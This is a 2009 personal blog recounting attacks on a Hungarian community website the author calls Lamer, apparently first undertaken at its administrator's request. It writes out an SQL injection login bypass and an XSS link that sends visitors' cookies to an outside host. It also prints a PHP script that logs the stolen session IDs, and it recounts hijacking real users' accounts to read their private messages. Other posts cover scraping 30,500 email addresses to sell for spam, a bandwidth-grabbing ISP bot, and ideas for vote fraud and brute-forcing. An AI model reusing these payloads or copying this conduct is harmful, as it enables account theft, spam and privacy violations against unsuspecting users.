Sunday, August 16, 2009

JALH (Just Another Lame Hack)

Not lame, the lamest. I won't describe this with every detail, it was just too lame. I was trying some other URL SQL Injections on Lamer (without any great success) when found something weird. 

When submitting a post on forum I was looking in Fiddler for the post data. And I found my username and user ID within. I thought it's a bad joke, a remnant from an old version... I mean my username was in the cookie with my coded password (long term cookies for "remember me" for a year or so logins), why require it on form... in hidden inputs. It wasn't hidden at all.

I copied the site to a local HTML file, replaced every relative path (./) to absolute ones (http://lamer_domain.top_level_domain/) with Notepad++, removed the type="hidden" attributes of the inputs, and opened it.

There was a form, where I couldn't just post a text, but I could specify the one posting it. Guess what, I picked the administrator (user ID 2). Well, I'm a l33t, at least I've done this on the test-page, so no real user was reading it.

I think that's all about Lamer. When I was first asked to hack Lamer, I was thinking that 5 successful attempts will be more than enough to be acknowledged as somebody important, so this is the point where I'll stop hunting, this was the fifth chance to do something a normal user shouldn't do. Lamer isn't lame any more, moreover, never really was. I still think it's the best site ever, and hope one day I'll be one of it's programmers. But don't worry, the world is full of hackable things, and this blog will be alive until the whole world won't become smarter than I am.

The more I hack the more ideas I get to hack. So please stand by, very soon you'll hear about me.

Friday, August 14, 2009

Hacking my own ISP

As you know ISP stands for Internet Service Provider, those guys who let you connect to the Internet, usually over against a particular amount of fee. The title says hack, but it's not really a hack, but a pretty good bug exploit.

It was before a festival, some guys got in trouble for a dirty business (nothing happened after all), but I got acquainted with one of them. He was a real hacker, without the slightest knowledge of programming. He has his own "friends", passwords, programs and money-making prospect (and I'm not talking about working here, it's more like stealing).

He lives close to me, close enough to have the same ISP. He told me that our Internet Service has a bug. Our provider gives dynamic IP (for me became static since I have router and not turning off too often), which I knew about. The trick I didn't knew, was that different IP addresses got different bandwidths. Inside the local network (it's larger than the whole city) there's about 2-5 MB/s speed, outside is 255-500 KB/s. But there are a few IP addresses which got more then 5 MB/s speed outside of the local network.

That was the time he became my costumer. I had programming knowledge, and he had every other. Helped me a lot to create the bot, which search for the owning IP. It was simple: connect, calculate the bandwidth, if it was good enough exit, else disconnect and start over. For connecting and disconnecting I used RasDial, for bandwidth calculation RapidShare. The whole thing was implemented in C#.

A little reference for both of them:

I think the second link is a broken one, or just the server is down temporary, either way I'll post my complete source code:

The program is very simple. I created a file (it's size is 1MB, but it can be changed), which is uploaded each time the bandwidth is calculated. The calculation is simple too, measure the time, and divide the uploaded file's size with it, then convert to KB/s.

To sum up, this wasn't that great of a hack. These IP's would have been allocated for users anyway, and a user could get access manually too, I just created a search bot to speed up the process. And I never taught about telling anyone in charge, I mean who don't wants speed? And why not to use it, if there's already outside somewhere?

If you have a dynamic IP, RasDial with the BotNet presented in the previous post can be used on anonymous voting polls. Vote, change IP and vote again (and do not accept any cookie). Maybe someday I'll create a software for that too. Another use would be brute-forcing logins. It's rustic but impossible to create defense against it. At least I couldn't do it.

But for now, I'll stay on Lamer, and attack it for a few more times.

Wednesday, August 12, 2009

Forth Attack: Click-Fraud-Bot (part 2)

At first I was thinking to get a simple browser with an open code written in C#, and use it's source to learn. After all, I needed an automated browser. But that was too complicated because I didn't needed the visualization of the response, just the request and response headers. And briefly the body too. But a whole browser was just too much. And anyway, most of them used premade libraries, which knew too much. Eh, I wanted a bit control.

After a bit research I decided to use the HttpWebRequest and HttpWebResponse classes, and wrote my own Browser class.

Source codes:

I used Fiddler 2 for creating the headers. I visited the website using Internet Explorer while Fiddler was opened. It's a web debugger, working as a local proxy, monitoring all incoming and outgoing requests. By comparing the headers created by IE and those crated by my program I could get a good job pretty fast.

The biggest problem were cookies. The site needed them, a non-member user can't do almost anything. Cookies most be stored then reseeded, but I just couldn't find where did they appeared. I squandered a whole day just with cookies. But after all it came out pretty good.

I regretted using C#. It's damn slow. My program too, I know, but still... it was running for a half an hour. But the result worth everything.  I got a .txt file with more than 30000 E-Mail addresses. It wasn't completely clear, tho, because some users used their E-mail as their User ID, and by doing this they screwed 2 other e-mails. It happened thanks to an option on the profile page of visiting the previous and next profiles, these being at the top of the page. Another problem was if users used @ in other fields like Name.

After another 20 minutes of clearing the text document, I finally got what I desired. Pure 30500 E-Mail addresses each one in a single line. Each of them validated and unique (but maybe deprecated).

Think about it. You have a business, great services for low price, but no one knows about you. Me, as your good friend, offer you 100 E-Mail addresses for 1 dollar. I think at least 20 will read it, 3 of them will get interested, and 2 of them will buy your service, and let's say one of them will return to you in the future. If every service earns you lets say 10$, you earned with this around 25$. By paying me 1$. Not a bad business so far right? OK, now let's think big. I sell you all of them, each 100 E-mail address 1$. I will earn 300$ and you around 500 costumer. The only loser is the administrator.

The worst is, I could have used this bot in a much better way. The site offered an E-Mail system too, you fill a form and it sends an E-Mail. I found a bug, whereby you could send E-Mail to those members as well who hid their E-Mail addresses (with simple URL SQL Injection). This way, I could have sent at least one E-Mail to 52000 user, and not being afraid that my IP and E-mail or those used to E-Mail gets to a black list, blocked, become spammer suspect and so on. After all it was the server who sent the E-Mails.

That's all. Nothing happened on your server, but one day you see that Mozilla is giving you a warning, Opera won't let you proceed to your own website, you get errors while sending E-Mails, your ISP is coming for you... big problems. Protect sensitive information!

What's the solution?

Sensitive information shouldn't be displayed as plain HTML. Use JavaScript to divide string. Example:


<script type="text/javascript">
at = '@';
document.write('mai'+'lto:'+'myemai'+'laddress'+at+'myemailpr'+'ovider');
</script>

The best would be to randomly cut up the string using PHP, put inside empty strings with random names, name string parts using random names then use as should, briefly randomly generate this JavaScript from PHP. The more complicated is the more secure will get.

Another method to secure would be to generate an image, which contains the E-Mail address. You can do this from PHP:


<?php
header("Content-type: image/jpeg");

$Str = "myemailaddress@myemailprovider.domain";
$NewImage = imagecreatefromjpeg("img.jpg");
$red = 50; $green = 50; $blue = 255;
$TextColor = imagecolorallocate($NewImage, $red, $green, $blue);
$fontSize = 8; $posX = 0; $posY = 0;
imagestring($NewImage, $fontSize, $posX, $posY, $Str, $TextColor);

imagejpeg($NewImage);
?>

If ./img.jpg looks like this:

the result is:


Much harder to hack (don't think it's impossible). This image was generated on my local server.

Stand by, very soon another post will come.

A Newbie's Observation

There were 4 successful attacks so far on Lamer. And one more task accomplished, I'll write about that later. I think it's enough to create a point of view about the reaction of the other's, in different positions.

The first part of the audience I would like to mention are the users of Lamer. They fell in my XSS trap, without even thinking. The link wasn't looking normal (it started with javascript: not with http://), but even if they hadn't had programing knowledge, they shouldn't had been so trustful. I mean, it was a YouTUBE video, why not use a direct link? The attack was browser-dependent, I think IE 6 couldn't handle is. There were users, who were still using that old-fashioned, really bad browser, and they went pretty far, by mentioning after my post, that the link is not working. And other's replayed that "Yes, it does". So they double checked it, and even after that no one had the smallest doubt. Those guys were trusting me too well, just because I was around for years. What's the moral? Do not trust anyone on the Internet.

Now let's talk about the administrator of Lamer. The site was hacked (before me) for a few times. There's just two types of attacks I know about: once the image-upload was hacked, by uploading a script, and the voting system was hacked several times. But I gained access to the whole database, several user forum-posts, user accounts and some user passwords too. That is, I think I accomplished more than everyone before. I mean, I'm not prising myself, it's just not an IT community. I'm saying that I'm starting to be a threat to Lamer. If it worked for 4 time, it may happen again. My relationship with the administrator, well I'm admiring him, not everyone writes a website, with several thousand line of code by himself, they use Joomla, Templates or premade scripts (just like this blog).

Briefly we came along well. After the first attack he thanked me, after the second attack he thanked me and he gave me access to a test user on Lamer, and to a test copy of Lamer at his local machine. We were discussing on how should he pay me. Not with money tho, with a service. He told me that he'll mention my name on the Impression section on Lamer. My reaction was telling him, not to do it. Sites got hacked every day, I don't want to be suspected in that community anything happens, not even if I'm the delinquent. Instead I asked for the source code of the site. Not the JavaScript and HTML you can download, but the PHP you can't (in a legal and easy way, with my knowledge I'll just say I can't). He told me, that he'll do it right away after installing a FTP server (was a few days ago, still nothing, but oh well, good things don't come fast).  It's a profit for both of us. I get reference material for future PHP project's (good for me), meanwhile I'll debug it (good for him).

Let's stick to the topic. Peoples reactions. I have a good friend, a girl, with pretty low knowledge of computers (I don't think she's not smart, yes she is, but it's not her side). It's true that it's against rule 3, but well, I told her. Her reaction: she panicked. She never could imagine that somebody can access her account just because she clicked a random link. There are cases when normal links, to trusted sites are malicious too. For example that description I gave before on Elite Hacker's forum, hacking the LA-PD's website. It's not good for session hijack but good enough to downloading a key-logger.

Tuesday, August 11, 2009

Forth Attack: Click-Fraud-Bot (part 1)

When I started writing this blog (yesterday) this was the last accomplished attack. It was just a few days ago, no change on Lamer since then. From my point of view this attack was the best ever. There wasn't any harm I could do, like in the previous cases, still I worked much more then before.

My programming knowledge is good. I mean I was learning programming for 7 years, I know the programming logic of more then 10 languages. Not the syntax tho, my memory is pretty bad. But with the help of Internet I can learn almost any language in a week. XML took me 2 hours.

I noticed that pages are distinguished just by a few very easy to guess information. For example, my user-page (profile, no modifying option available there) has an URL like this:

http://lamer_domain_name/user.php?userpage.9767

It's because I am the 9769th registered user. At the time of attack there were around 52000 registered users, which means every page from

http://lamer_domain_name/user.php?userpage.1

to

http://lamer_domain_name/user.php?userpage.52000

existed and contained an e-mail address. That is, if the users haven't chose the "Hide e-mail" option. But even if half of the users hid it, there were more than 20000 E-mails available for me (only registered users could see other's profile). And I wanted them. A .txt file containing several thousand of e-mail addresses in several lines. The only thing remaining was to create that bot. At first I chose php, which would have run on the server installed on my PC. But after some struggle I was thinking that "My, my, I wasn't learning that many languages to use this useless one for this task". Well, not a useless one, but yes, useless for that task. The most simple was C#.

So I chose C#.

Third Attack: XSS, Cookie Hijack and Cookie Manipulation

Despite the title, it really was a single attack. For almost a whole month of learning the ways of XSS (not CSS) and Cookie Hijack I started creating my own attacks. At first I thought XSS was an unbeatable prodigy, but after a while I realized it's noting more than embedding a script written in JavaScript language. Here's a few really good reference for it:

Even if you don't want to read a lot I recommend you the last one. A good attack on LA-PD's site is explained available for anyone.

Many things can be accomplished using XSS, but I wanted session hijacking. After reading about this on several places, I understood what I need. A place where I can write this simple JavaScript code:


document.cookie

That's a variable which contains all of the cookies of a user. I had to save it's value to a file available for me in a script available for everyone. I found that writing this

'>

to a search box on Lamer, wrote me some HTML code as text. I realized this by writing to the search box every special character I could think of. So I thought what about putting there another property, like:

' text='document.cookie'>

But wasn't this simple. And the struggling began. I came up with a pretty good XSS string after several days studying those on cheat-sheet, but every apostrophe used, got a / sign before it after pressing the search button, so my code became unprocurable and uninterpretable. I almost gave up every hope I had, when I found this. A harmless little trick. I found out from this, that by typing in the URL bar javascript:my_javascripts_script it's executed on the last site visited. It was browser-dependent tho.

I went to my user-page and I gave the following attribute to an input (I think was my signature, it's written in BB-code):

[link=javascript:window.location = "http://www.mysite.com/myscript.php?"+document.cookie]You need to visit this[/link]

And it worked. By clicking on the link it went to:

http://www.mysite.com/myscript.php?sitename=SinistraD%3A%3A%3A%here_was_a_hash_from_my_password; SiteNameCookieExpire=1250088989; PHPSESSID=2f65b91d6f8a72d1d5128f8afb8f67a7

This worked only if it was placed at the beginning of the input, otherwise somewhere (maybe on the server) got a http:// at the beginning, screwing the whole thing, because http://javascript: was not working any more. So, there was protection, but it had that little bug. Was not working, if started at the beginning. Thanks to that my script was. The only thing left was to implement the myscript.php. Here's the code:


<?php
$f = fopen("sessionids.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/watch?v=wzqi1bfflDg");
?>

It saves the request URL, then redirects somewhere else, so the user won't be suspicious. After my setup was ready, I removed it from my profile and posted on the forum, on a topic where this was expected (links to other sites, funny and/or interesting references, mostly on YouTUBE).

I hadn't had to wait long, many users fell in the trap, the last thing remained was to use their cookies. I logged in with my user, removed every cookie except the one containing the session ID, then modified it's value by giving another given one. "Surprisingly", the result was, that I wasn't myself any more, but the user clicking on the link. The task with highest priority was to write a mail to the administrator using that account (not mine), but I had to hurry, because when you log in, the real user logs out automatically, and when he logs back in, he gets a new session ID, by this, mine becoming useless.

I had pretty much fun reading their personal messages, stored and implemented in the mail system offered by the site. It's just a PM system not an e-mail one.

This attack was my biggest accomplishment so far. But this time I was already thinking about implementing my own self, with high speed, a robot, who surfs without me, a click-fraud-bot.

The Second Attack: URL SQL Injection

I tried to find many basic vulnerabilities on Lamer, and sometimes found little candidates, but after all, I realized it was nothing.

But a few days after that request, I decided to try the attack known as URL SQL Injection in every place I could think about. Well not every place, only those places I could gain something, that I shouldn't have permitted.

After several minute of search I found the place I was looking for. In forums there was an option of editing your posts in the next 24 hours after posting it. After every post less older then 24 hour, was a link:

http:/domain_name/forum.php?postedit.58.4727.470396.147

There were many numbers. For example the first one is the topic id. But I really didn't knew what the others were for. So I tried modifying them, adding or extracting a bit.  Modifying the second value didn't do anything. But the third value showed me other user's posts... in an input label. This way I could edit anything on the forum. Well not really, because the numbering was distributed in a weird way. But the most recent posts were in my hand. And no one could ever know who did it (well, this is, if there was no logging behind the scenes). Unfortunately the bug didn't got fixed, not talking about that I reported it more then a month ago.

Monday, August 10, 2009

My Rules of Being a Hacker

1. Don't do anything illegal, until the victim grands you the right.

2. If you succeed, you perform a successful attack or you find a hole, you must tell this to those who are in charge of security.

3. If you succeed, you perform a successful attack or you find a hole, you can not tell anyone about it, except those mentioned in rule 2.

4. Do not destroy. Be a read-only hacker. If you don't know what are you doing, you can't predict the result, do it on a test area, or ask the administrator if that is a vulnerability or just seems so.

5. You must not sell the information you got after successful hacks.


The only rude thing I can't make a rule about it, is to not learn. I understand here, that after every successful attack I saved every information, including letters, conversations, e-mail addresses and so on. I observe the rule 1 with this, because when I am hacking, I am doing for an appeal, so the victim granted me the right. These are informations available for the victim, now for me too.

You may think that by writing this blog, I'm infringing rule 3. That's not true. You who are reading this, you know me as a hacker, and that's all. From the world I hack no one will come here, and from here no one will go there. This is why I never tell you Lamer's real domain name, valid link, and so one. There are plenty of Sinistra's out there (don't even try searching Google), so you'll never know which one's are my user's (at least I hope so). Anyway, if it would really happen for a few times, why does it matter?

I'm not writing this, to show you how great I am, I'll just give you a little material if you want to learn.

First Attack: SQL Injection

When I first searched for hacking reference (after getting this real-time mission), I found a pretty good introduction. It was the first hit on Google.

After I understood that technique (I think it's pretty simple) I was thinking about "No way that could work here", but than "Oh well, lets try at least". I went to the victim's site's (I'll call it Lamer hereafter, even tho I admire that work) main page. There is a login form. So I typed the following as user-name and password:

'

If you introduce a wrong username/password combination, you'll get a warning, a cute little girl saying that you're not doing the right way, but this time there was an SQL error. Something like syntax error near... and gave me a string. Yeah, a bit from the SQL code from a stored procedure.

I knew I was in, I just had to use the hole to create a fake login. But a little problem occurred there. The user-string from the password input was used in a function, not in a condition. It couldn't be helped, after 1 day of struggle I gave up, and wrote to the system administrator about the hole. I just couldn't lose and tried over and over again, but no success. I could earn that a string like this:

mypassword') or ('1'='1

was working, but no other variation. And this wasn't good ether if I left the mypassword part behind. Yes, like this I could even delete the whole database, writing multiple query's there, but couldn't log in as somebody else.

The bug got fixed. It was my lost. After a while I went back to check out the bugfix, and was true, the apostrophe on the password input gave me a handled error not an SQL one. But...

The username input still lacked the bugfix. Than I had the grand return. I wrote the following inputs:

username: ') or ('1'='1
password: butterfly

And ta-daaaam logged in into a simple unused account. Well I explain this: the username is always true, so that was the first user in the database whose password was butterfly (it was a girl, I mean no offense... but so naive).

You may ask what did I felt when I took a greedy look on my first successful hacker attack, whereof a long time I was dreaming. Well I was a bit disappointed. It was, because I had to choose between telling everyone in a fancy way that look, what have I done or tell the administrator and remain nameless forever. But that's it. I had to remember my rules of being an elite hacker.

The Beginning

In the beginning I was playing hacker games.  Exploitable Web pages made, to be hacked. There was a Hungarian website supported by Microsoft, but those missions are long gone, so I won't give you any link. Today some cryptographic mission can be found there, not too interesting. From the 10 missions available I think I succeeded 8 of them. 

Then I went out in search for other hacker games, and I found http://www.hackthissite.org and some other sites, but I couldn't even complete the basic missions. Looking at the solution just lacked the fun.

When I couldn't think of anything new, I started writing my own web page, with the intention of making it's code public. Until I finished the registration system of the website I got bored, and stopped building it. That was... hacking as a game.

But long lost something changed. As a response to topic post of mine, somebody asked me to test he's page's hackable points. Briefly he asked me to hack hes web page. It was one of those web pages I really knew. It was almost the first site I hang, after getting Internet (few years ago). It's the biggest Hungarian site of it's topic, with more then 50000 registered users. It's code is huge, with almost any service you can think about: login system, forum, image gallery, PM system, torrent tracker, file-exchange and many more. When I tried writing my own web sites I used it's HTML and CSS codes for reference.

That was it, I started studying about attacks against websites to hack that website. And when I first found a hole, I couldn't believe my eyes.